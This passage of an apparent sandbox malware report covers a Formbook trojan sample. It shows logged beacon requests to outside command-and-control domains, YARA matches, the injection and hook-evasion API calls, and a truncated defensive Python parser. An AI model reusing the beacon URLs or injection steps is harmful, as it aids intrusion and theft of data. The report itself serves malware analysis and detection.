              Data Ascii:
          Source: global traffic | HTTP traffic detected: GET /u2kb/?pJ=y0bMVGhK3R&s7=im5SXjRwbJIZeY2yeMVWNNnKg99Etck2UhYi2fNZ2Kf/X7lq2SPR1Q6pROq8Gck3yLtOH/fXnE++yuD9U7pi0eI0K5lBX7KNLg== HTTP/1.1
              Host: www.thedivinerudraksha.com
              Connection: close
              Data Raw: 00 00 00 00 00 00 00
              Data Ascii:
          Source: global traffic | HTTP traffic detected: GET /u2kb/?pJ=y0bMVGhK3R&s7=pRDkJdNDOVoQCU+9NHQShuJ8RlIM2fjCZpxzdvjpnmqfDHzh6n+FGyromdVZx0/+Z3ctR0ZwX+ep4hJ0NBR+2QmcJmTx4hb/kQ== HTTP/1.1
              Host: www.un-object.com
              Connection: close
              Data Raw: 00 00 00 00 00 00 00
              Data Ascii:
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Garf.Gen.6.31593.18898.exe | Code function: 0_2_00405809 GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,ShowWindow,ShowWindow,GetDlgItem,SendMessageW,SendMessageW,SendMessageW,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageW,CreatePopupMenu,AppendMenuW,GetWindowRect,TrackPopupMenu,SendMessageW,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageW,GlobalUnlock,SetClipboardData,CloseClipboard,

          E-Banking Fraud

          Source: Yara match | File source: 3.2.vfpbkeeo.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 3.2.vfpbkeeo.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 00000005.00000002.567150912.0000000000D10000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara match | File source: 00000003.00000002.352371790.00000000008C0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara match | File source: 00000003.00000002.352064891.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara match | File source: 00000003.00000002.352209935.0000000000430000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara match | File source: 00000005.00000002.567279277.0000000000D50000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara match | File source: 00000005.00000002.567056934.0000000000C20000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY

          System Summary

          Source: 3.2.vfpbkeeo.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 3.2.vfpbkeeo.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 3.2.vfpbkeeo.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 3.2.vfpbkeeo.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000005.00000002.567150912.0000000000D10000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 00000005.00000002.567150912.0000000000D10000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000003.00000002.352371790.00000000008C0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 00000003.00000002.352371790.00000000008C0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000003.00000002.352064891.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 00000003.00000002.352064891.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000003.00000002.352209935.0000000000430000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 00000003.00000002.352209935.0000000000430000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000005.00000002.567279277.0000000000D50000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 00000005.00000002.567279277.0000000000D50000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000005.00000002.567056934.0000000000C20000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 00000005.00000002.567056934.0000000000C20000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: SecuriteInfo.com.Trojan.Garf.Gen.6.31593.18898.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
          Source: 3.2.vfpbkeeo.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 3.2.vfpbkeeo.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 3.2.vfpbkeeo.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 3.2.vfpbkeeo.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000005.00000002.567150912.0000000000D10000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 00000005.00000002.567150912.0000000000D10000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000003.00000002.352371790.00000000008C0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 00000003.00000002.352371790.00000000008C0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000003.00000002.352064891.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 00000003.00000002.352064891.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY    Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000003.00000002.352209935.0000000000430000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY    Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 00000003.00000002.352209935.0000000000430000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY    Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000005.00000002.567279277.0000000000D50000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY    Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 00000005.00000002.567279277.0000000000D50000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY    Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000005.00000002.567056934.0000000000C20000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY    Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 00000005.00000002.567056934.0000000000C20000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY    Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Garf.Gen.6.31593.18898.exe    Code function: 0_2_00403640 EntryPoint,SetErrorMode,GetVersionExW,GetVersionExW,GetVersionExW,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,ExitProcess,OleUninitialize,ExitProcess,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Garf.Gen.6.31593.18898.exe    Code function: 0_2_00406D5F
          Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exe    Code function: 1_2_00410331
          Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exe    Code function: 1_2_00A408B7
          Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exe    Code function: 1_2_00A40A3B
          Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exe    Code function: 3_2_0040C043
          Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exe    Code function: 3_2_00405873
          Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exe    Code function: 3_2_00401824
          Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exe    Code function: 3_2_00401830
          Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exe    Code function: 3_2_0040C03E
          Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exe    Code function: 3_2_004038F3
          Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exe    Code function: 3_2_00422A4C
          Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exe    Code function: 3_2_00401BD0
          Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exe    Code function: 3_2_00405653
          Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exe    Code function: 3_2_00420753
          Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exe    Code function: 3_2_009BB090
          Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exe    Code function: 3_2_00A61002
          Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exe    Code function: 3_2_009AF900
          Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exe    Code function: 3_2_009C4120
          Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exe    Code function: 3_2_009DEBB0
          Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exe    Code function: 3_2_009B841F
          Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exe    Code function: 3_2_009A0D20
          Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exe    Code function: 3_2_00A71D55
          Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exe    Code function: 3_2_009C6E30
          Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exe    Code function: String function: 00401980 appears 42 times
          Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exe    Code function: 3_2_0041E833 NtAllocateVirtualMemory,
          Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exe    Code function: 3_2_0041E653 NtCreateFile,
          Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exe    Code function: 3_2_0041E703 NtReadFile,
          Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exe    Code function: 3_2_0041E783 NtClose,
          Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exe    Code function: 3_2_009E98F0 NtReadVirtualMemory,LdrInitializeThunk,
          Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exe    Code function: 3_2_009E9840 NtDelayExecution,LdrInitializeThunk,
          Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exe    Code function: 3_2_009E9860 NtQuerySystemInformation,LdrInitializeThunk,
          Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exe    Code function: 3_2_009E99A0 NtCreateSection,LdrInitializeThunk,
          Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exe    Code function: 3_2_009E9910 NtAdjustPrivilegesToken,LdrInitializeThunk,
          Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exe    Code function: 3_2_009E9A00 NtProtectVirtualMemory,LdrInitializeThunk,
          Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exe    Code function: 3_2_009E9A20 NtResumeThread,LdrInitializeThunk,
          Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exe    Code function: 3_2_009E9A50 NtCreateFile,LdrInitializeThunk,
          Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exe    Code function: 3_2_009E95D0 NtClose,LdrInitializeThunk,
          Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exe    Code function: 3_2_009E9540 NtReadFile,LdrInitializeThunk,
          Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exe    Code function: 3_2_009E96E0 NtFreeVirtualMemory,LdrInitializeThunk,
          Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exe    Code function: 3_2_009E9660 NtAllocateVirtualMemory,LdrInitializeThunk,
          Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exe    Code function: 3_2_009E9780 NtMapViewOfSection,LdrInitializeThunk,
          Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exe    Code function: 3_2_009E97A0 NtUnmapViewOfSection,LdrInitializeThunk,
          Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exe    Code function: 3_2_009E9FE0 NtCreateMutant,LdrInitializeThunk,
          Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exe    Code function: 3_2_009E9710 NtQueryInformationToken,LdrInitializeThunk,
          Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exe    Code function: 3_2_009E98A0 NtWriteVirtualMemory,
          Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exe    Code function: 3_2_009E9820 NtEnumerateKey,
          Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exe    Code function: 3_2_009EB040 NtSuspendThread,
          Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exe    Code function: 3_2_009E99D0 NtCreateProcessEx,
          Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exe    Code function: 3_2_009E9950 NtQueueApcThread,
          Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exe    Code function: 3_2_009E9A80 NtOpenDirectoryObject,
          Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exe    Code function: 3_2_009E9A10 NtQuerySection,
          Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exe    Code function: 3_2_009EA3B0 NtGetContextThread,
          Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exe    Code function: 3_2_009E9B00 NtSetValueKey,
          Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exe    Code function: 3_2_009E95F0 NtQueryInformationFile,
          Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exe    Code function: 3_2_009EAD30 NtSetContextThread,
          Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exe    Code function: 3_2_009E9520 NtWaitForSingleObject,
          Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exe    Code function: 3_2_009E9560 NtWriteFile,
          Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exe    Code function: 3_2_009E96D0 NtCreateKey,
          Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exe    Code function: 3_2_009E9610 NtEnumerateValueKey,
          Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exe    Code function: 3_2_009E9650 NtQueryValueKey,
          Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exe    Code function: 3_2_009E9670 NtQueryInformationProcess,
          Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exe    Code function: 3_2_009EA710 NtOpenProcessToken,
          Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exe    Code function: 3_2_009E9730 NtQueryVirtualMemory,
          Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exe    Code function: 3_2_009E9770 NtSetInformationFile,
          Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exe    Code function: 3_2_009EA770 NtOpenThread,
          Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exe    Code function: 3_2_009E9760 NtOpenProcess,
          Source: SecuriteInfo.com.Trojan.Garf.Gen.6.31593.18898.exe    ReversingLabs: Detection: 42%
          Source: SecuriteInfo.com.Trojan.Garf.Gen.6.31593.18898.exe    Virustotal: Detection: 42%
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Garf.Gen.6.31593.18898.exe    File read: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Garf.Gen.6.31593.18898.exe
          Source: SecuriteInfo.com.Trojan.Garf.Gen.6.31593.18898.exe    Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Garf.Gen.6.31593.18898.exe    Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
          Source: unknown    Process created: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Garf.Gen.6.31593.18898.exe C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Garf.Gen.6.31593.18898.exe
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Garf.Gen.6.31593.18898.exe    Process created: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exe "C:\Users\user\AppData\Local\Temp\vfpbkeeo.exe" C:\Users\user\AppData\Local\Temp\bzuxwizqdxf.m
          Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exe    Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exe    Process created: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exe C:\Users\user\AppData\Local\Temp\vfpbkeeo.exe
          Source: C:\Windows\explorer.exe    Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exe
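The Nt* rows above (the 3_2_009E9xxx functions) and the process-created rows together tell the injection story of this sample: the NSIS installer drops vfpbkeeo.exe, which re-executes itself, and the payload later runs from explorer.exe and a SysWOW64 cmd.exe. Two things worth knowing when reading those rows. First, the leading number is Joe Sandbox's process index, not an OS PID; the dump names elsewhere in this report tie index 1 and 3 to the two vfpbkeeo.exe instances, 4 to explorer.exe and 5 to cmd.exe. Second, every one of the Nt* stubs sits in the 0x980000 to 0xA9F000 range that the report's wntdll.pdb rows attribute to process 3, so these calls go through a second, privately mapped copy of ntdll rather than the system-loaded one (the usual way of getting past user-mode API hooks); that is an inference from the report's own address ranges, not something the report states. The script below is an added example, not code from the report or from Joe Sandbox: it parses rows in the form the text export uses (Source cell and evidence cell run together), collects the Nt* primitives per process index, checks them against a hollowing/APC-injection primitive set of my choosing, and rebuilds the parent/child chain. The rows embedded in SAMPLE_ROWS are copied from this report; KINDS and INJECTION_PRIMITIVES are my assumptions.

```python
import re
from collections import defaultdict

# Evidence kinds this parser knows about (a subset of Joe Sandbox's labels; assumption).
KINDS = (
    "Matched rule", "Code function", "Process created", "File created", "File read",
    "Key opened", "Key value queried", "Static PE information", "Binary or memory string",
    "Unpacked PE file", "Process information set",
)
# The text export fuses the Source cell with the evidence cell ("...exeCode function: ..."),
# so the kind label is matched from the list above; a separating " | " is tolerated too.
ROW_RE = re.compile(
    r"^Source:\s*(?P<source>.+?)\s*\|?\s*(?P<kind>" + "|".join(map(re.escape, KINDS)) + r"):\s*(?P<detail>.*)$"
)
# "3_2_009E9A20 NtResumeThread,LdrInitializeThunk," -> process index 3, sandbox dump index 2, address.
FUNC_RE = re.compile(r"^(?P<pid>\d+)_(?P<idx>\d+)_(?P<addr>[0-9A-Fa-f]+)\s*(?P<apis>.*)$")

# Primitives that together make up process hollowing / APC injection (my selection).
INJECTION_PRIMITIVES = frozenset({
    "NtCreateProcessEx", "NtCreateSection", "NtMapViewOfSection", "NtUnmapViewOfSection",
    "NtWriteVirtualMemory", "NtProtectVirtualMemory", "NtGetContextThread",
    "NtSetContextThread", "NtQueueApcThread", "NtResumeThread",
})

# Rows copied from this report, in the fused form of the text export.
SAMPLE_ROWS = r"""
Source: unknownProcess created: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Garf.Gen.6.31593.18898.exe C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Garf.Gen.6.31593.18898.exe
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Garf.Gen.6.31593.18898.exeProcess created: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exe "C:\Users\user\AppData\Local\Temp\vfpbkeeo.exe" C:\Users\user\AppData\Local\Temp\bzuxwizqdxf.m
Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exeProcess created: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exe C:\Users\user\AppData\Local\Temp\vfpbkeeo.exe
Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exe
Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exe
Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exeCode function: 3_2_0041E833 NtAllocateVirtualMemory,
Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exeCode function: 3_2_009E9840 NtDelayExecution,LdrInitializeThunk,
Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exeCode function: 3_2_009E99A0 NtCreateSection,LdrInitializeThunk,
Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exeCode function: 3_2_009E9A00 NtProtectVirtualMemory,LdrInitializeThunk,
Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exeCode function: 3_2_009E9A20 NtResumeThread,LdrInitializeThunk,
Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exeCode function: 3_2_009E9780 NtMapViewOfSection,LdrInitializeThunk,
Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exeCode function: 3_2_009E97A0 NtUnmapViewOfSection,LdrInitializeThunk,
Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exeCode function: 3_2_009E98A0 NtWriteVirtualMemory,
Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exeCode function: 3_2_009E99D0 NtCreateProcessEx,
Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exeCode function: 3_2_009E9950 NtQueueApcThread,
Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exeCode function: 3_2_009EA3B0 NtGetContextThread,
Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exeCode function: 3_2_009EAD30 NtSetContextThread,
Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exeCode function: 3_2_009A9080 mov eax, dword ptr fs:[00000030h]
"""


def parse_rows(text):
    """One dict (source, kind, detail) per recognisable evidence row."""
    rows = []
    for line in text.splitlines():
        m = ROW_RE.match(line.strip())
        if m:
            rows.append(m.groupdict())
    return rows


def nt_calls_by_process(rows):
    """Map sandbox process index -> set of Nt* APIs seen in its 'Code function' rows."""
    calls = defaultdict(set)
    for r in rows:
        if r["kind"] != "Code function":
            continue
        f = FUNC_RE.match(r["detail"])
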